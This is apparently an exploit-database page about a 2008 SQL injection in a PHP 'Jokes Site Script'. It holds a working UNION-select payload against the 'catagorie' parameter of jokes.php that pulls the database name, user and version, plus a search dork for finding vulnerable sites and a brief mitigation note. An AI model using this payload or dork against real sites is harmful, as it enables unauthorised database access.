header-logo
Suggest Exploit
vendor:
phpjokescript.asp
by:
ProgenTR
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: phpjokescript.asp
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

scriptismi:Jokes Site Script

This vulnerability allows an attacker to inject arbitrary SQL commands into the vulnerable application. The attacker can use this vulnerability to gain access to the database, modify data, or execute system commands. The vulnerable parameter is the 'catagorie' parameter in the 'jokes.php' script. By manipulating the parameter, an attacker can inject arbitrary SQL commands into the application.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

author:ProgenTR

scriptismi:Jokes Site Script

script :http://www.yourfreeworld.com/script/phpjokescript.asp

fiyat:$49

demo:http://www.autowebhits.com/jokesite/

jokes.php?catagorie=-1%20union%20select%201,convert(concat(database(),char(58),user(),char(58),version()),char)/*


dork:allinurl:"jokes.php?catagorie="

# milw0rm.com [2008-04-27]